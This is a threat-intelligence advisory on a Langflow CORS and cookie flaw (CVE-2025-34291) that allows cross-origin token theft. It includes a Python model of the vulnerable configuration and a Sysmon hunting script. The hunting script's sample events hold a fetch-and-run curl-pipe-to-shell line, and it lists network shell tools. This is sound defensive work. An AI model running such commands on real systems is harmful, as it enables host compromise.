ctipilot.ch

Langflow AI Platform CORS misconfiguration + SameSite=None refresh token cross-origin token theft

cve · CVE-2025-34291

Coverage timeline: 1 brief, first 2026-05-22 → last 2026-05-22
Briefs: 1 (1 distinct)
Sources cited: 1 (1 host)
Sections touched: 1 (trending_vulns)
Co-occurring entities: 0 (no co-occurrence)

Story timeline

  1. 2026-05-22: CTI Daily Brief — 2026-05-22
     trending_vulns: Added to CISA KEV 2026-05-21; Flodric botnet; upgrade to 1.7.0/1.9.3

Where this entity is cited

  • trending_vulns: 1

Source distribution

  • cisa.gov: 1 (100%)

Items in briefs about Langflow AI Platform CORS misconfiguration + SameSite=None refresh token cross-origin token theft (1)

CVE-2025-34291 — Langflow AI Workflow Platform: CORS misconfiguration + SameSite=None refresh token enables cross-origin token theft (CISA KEV, ITW, Flodric botnet)

From CTI Daily Brief — 2026-05-22 · published 2026-05-22

CVE-2025-34291 (CVSS 4.0: 9.4 / CVSS 3.1: 8.8, CWE-942 Permissive Cross-domain Policy with Untrusted Domains) affects Langflow <= 1.6.9. Two defaults combine: the CORS policy ships as allow_origins='*' with allow_credentials=True, and the refresh-token cookie is issued with SameSite=None. Browsers refuse a literal '*' Access-Control-Allow-Origin on a credentialed request, so Starlette/FastAPI's CORS middleware satisfies this combination by reflecting whatever Origin the request carries, which allowlists every origin in practice. SameSite=None means the browser attaches the refresh cookie to a cross-site fetch made with credentials: 'include'; HttpOnly does not help, because the attacker never reads the cookie, the browser sends it. A malicious page can therefore call /api/v1/auth/refresh in the victim's session, read the returned access token, and then call every authenticated endpoint, including Langflow's code-execution functionality. The only precondition is that a user with a live Langflow session loads an attacker-controlled page; no prior access to the instance is needed (T1190 Exploit Public-Facing Application).

First confirmed exploitation: 2026-01-23; Trend Micro documented Flodric botnet deployment through compromised Langflow instances. CISA added CVE-2025-34291 to KEV on 2026-05-21.

Fixed in Langflow 1.7.0 (restrictive CORS default) and 1.9.3 (explicit fix). Mitigations: do not expose Langflow instances to the internet; serve them over HTTPS only with an explicit CORS origin allowlist (never '*' together with credentials); hunt for anomalous child processes of the Langflow process tree (Sysmon EID 1 with parent langflow-backend or uvicorn).
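The two conditions the brief combines, a cookie the browser will attach cross-site and CORS headers that let the foreign page read the response, can be checked side by side. The block below is an added example written for this page, not Langflow code: it models the browser's credentialed-CORS and SameSite rules and the Origin-reflecting behaviour of Starlette's CORSMiddleware when allow_origins=['*'] is paired with allow_credentials=True, then evaluates the vulnerable default against a hardened configuration. The cookie name, origins and token value are placeholders.

```python
"""Model of CVE-2025-34291's preconditions (editor's example, stdlib only).

cookie_sent_on_cross_site_fetch: would a browser attach the refresh cookie
to a credentialed fetch() from another site?
cors_headers_for: what a Starlette/FastAPI CORSMiddleware answers to a
non-preflight request, modelled on its Origin-reflection behaviour.
response_readable_cross_site: the browser rule for reading that answer.
"""
from dataclasses import dataclass


def cookie_sent_on_cross_site_fetch(set_cookie: str, over_https: bool = True) -> bool:
    """Only SameSite=None cookies ride along on a cross-site fetch/XHR, and
    SameSite=None is honoured only together with Secure on HTTPS. Lax (the
    Chromium default when the attribute is absent) and Strict are never sent
    on a cross-site fetch."""
    parts = [p.strip() for p in set_cookie.split(";")]
    attrs = {}
    for part in parts[1:]:                      # parts[0] is name=value
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip().lower()
    samesite = attrs.get("samesite", "lax")
    return samesite == "none" and "secure" in attrs and over_https


@dataclass
class CorsConfig:
    allow_origins: list
    allow_credentials: bool


def cors_headers_for(cfg: CorsConfig, request_origin: str, request_has_cookie: bool) -> dict:
    """Response headers for a simple (non-preflight) request. With '*' in
    allow_origins and allow_credentials=True the middleware cannot emit the
    literal '*' on a request that carries cookies, so it reflects the
    requesting Origin instead (modelled Starlette behaviour)."""
    headers = {}
    allow_all = "*" in cfg.allow_origins
    if cfg.allow_credentials:
        headers["access-control-allow-credentials"] = "true"
    if allow_all and request_has_cookie:
        headers["access-control-allow-origin"] = request_origin   # reflection
    elif allow_all:
        headers["access-control-allow-origin"] = "*"
    elif request_origin in cfg.allow_origins:
        headers["access-control-allow-origin"] = request_origin
    return headers


def response_readable_cross_site(request_origin: str, headers: dict) -> bool:
    """Browser rule for credentials: 'include': ACAO must equal the exact
    Origin (a literal '*' is rejected) and ACAC must be 'true'."""
    acao = headers.get("access-control-allow-origin")
    acac = headers.get("access-control-allow-credentials", "").lower() == "true"
    return acao is not None and acao != "*" and acao == request_origin and acac


def token_theft_possible(cfg: CorsConfig, refresh_set_cookie: str,
                         attacker_origin: str = "https://attacker.example") -> bool:
    """True when an attacker page can both carry the victim's refresh cookie
    to /api/v1/auth/refresh and read the access token that comes back."""
    sent = cookie_sent_on_cross_site_fetch(refresh_set_cookie)
    headers = cors_headers_for(cfg, attacker_origin, request_has_cookie=sent)
    return sent and response_readable_cross_site(attacker_origin, headers)


# Vulnerable default described in the brief (placeholder cookie name/value).
VULNERABLE = CorsConfig(allow_origins=["*"], allow_credentials=True)
VULN_COOKIE = "refresh_token=PLACEHOLDER; HttpOnly; Secure; SameSite=None; Path=/"

# Hardened: explicit origin allowlist and a refresh cookie the browser keeps
# first-party (placeholder origin).
HARDENED = CorsConfig(allow_origins=["https://langflow.internal.example"], allow_credentials=True)
HARD_COOKIE = "refresh_token=PLACEHOLDER; HttpOnly; Secure; SameSite=Lax; Path=/"

if __name__ == "__main__":
    for label, cfg, cookie in (("default", VULNERABLE, VULN_COOKIE),
                               ("hardened", HARDENED, HARD_COOKIE)):
        print(f"{label}: cross-origin token theft possible = {token_theft_possible(cfg, cookie)}")
```

To check a live instance the same way, send a request with a foreign Origin header and a session cookie (for example with curl) and feed the Access-Control-Allow-Origin / Access-Control-Allow-Credentials values to response_readable_cross_site, and the Set-Cookie line from /api/v1/auth/refresh to cookie_sent_on_cross_site_fetch. Either function alone returning False is enough to break the chain, which is why both the allowlist and the SameSite change are worth making.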
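The hunting guidance at the end of the brief (Sysmon EID 1, parent langflow-backend or uvicorn) is easy to implement but easy to get wrong: on a Linux host started with `python -m langflow run`, the parent image is the Python interpreter, not langflow-backend, so matching ParentImage alone misses it. The block below is an added example, not part of the brief or of Langflow: it runs a parent-tree hunt over constructed EID 1 records (paths, command lines, timestamps and the 203.0.113.5 address are all made up) and checks both the parent image name and the parent command line.

```python
"""Hunt Sysmon EID 1 (process creation) records for children of the Langflow
process tree (editor's example, stdlib only). Events are plain dicts keyed
by the EID 1 field names; a real pipeline would fill them from the event
XML or the Sysmon-for-Linux syslog line."""

# Parent names the brief points at, plus the bare `langflow` entry point.
LANGFLOW_PARENTS = {"langflow-backend", "uvicorn", "langflow"}
# Children that should essentially never be spawned by a workflow server.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc",
                       "ncat", "base64", "chmod", "powershell", "cmd"}


def _basename(path: str) -> str:
    """Last path component for either Linux or Windows paths, without .exe."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return name[:-4] if name.lower().endswith(".exe") else name


def is_langflow_parent(event: dict) -> bool:
    """Match on the parent image name, or on the parent command line for the
    `python -m langflow run` / `python -m uvicorn ...` start-up forms."""
    if _basename(event.get("ParentImage", "")) in LANGFLOW_PARENTS:
        return True
    pcmd = event.get("ParentCommandLine", "").lower()
    return "langflow" in pcmd or "uvicorn" in pcmd


def hunt_langflow_children(events: list) -> list:
    """Return one finding per EID 1 event whose parent is the Langflow tree.
    Shells and downloaders are 'high'; anything else is 'review' because
    interpreter children can be legitimate workflow execution."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 1 or not is_langflow_parent(ev):
            continue
        child = _basename(ev.get("Image", ""))
        findings.append({
            "time": ev.get("UtcTime"),
            "user": ev.get("User"),
            "child": child,
            "severity": "high" if child in SUSPICIOUS_CHILDREN else "review",
            "cmd": ev.get("CommandLine", ""),
        })
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # shell spawned by a Langflow worker whose parent image is plain python
        "EventID": 1, "UtcTime": "2026-01-23 03:14:07.120",
        "Image": "/usr/bin/sh",
        "CommandLine": "sh -c curl -fsSL http://203.0.113.5/stage.sh | sh",
        "ParentImage": "/opt/langflow/.venv/bin/python3.11",
        "ParentCommandLine": "/opt/langflow/.venv/bin/python3.11 -m langflow run --host 0.0.0.0 --port 7860",
        "User": "langflow",
    },
    {   # an operator's interactive shell, unrelated to Langflow
        "EventID": 1, "UtcTime": "2026-01-23 03:15:01.003",
        "Image": "/usr/bin/ls", "CommandLine": "ls -la /var/log",
        "ParentImage": "/usr/bin/bash", "ParentCommandLine": "-bash", "User": "ops",
    },
    {   # interpreter child of uvicorn: plausibly legitimate, still worth a look
        "EventID": 1, "UtcTime": "2026-01-23 03:16:42.551",
        "Image": "/opt/langflow/.venv/bin/python3.11",
        "CommandLine": "python3.11 -c print(1)",
        "ParentImage": "/opt/langflow/.venv/bin/uvicorn",
        "ParentCommandLine": "uvicorn langflow.main:create_app --port 7860",
        "User": "langflow",
    },
    {   # network-connection event (EID 3): not process creation, skipped
        "EventID": 3, "UtcTime": "2026-01-23 03:14:08.000",
        "Image": "/usr/bin/curl", "DestinationIp": "203.0.113.5", "DestinationPort": 80,
    },
]

if __name__ == "__main__":
    for f in hunt_langflow_children(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['time']} {f['user']} {f['child']}: {f['cmd']}")
```

Tune SUSPICIOUS_CHILDREN to the deployment: a Langflow instance that legitimately runs shell-based components will need those parents or commands excluded, but a downloader piped into a shell under the langflow service account is never expected and should page someone.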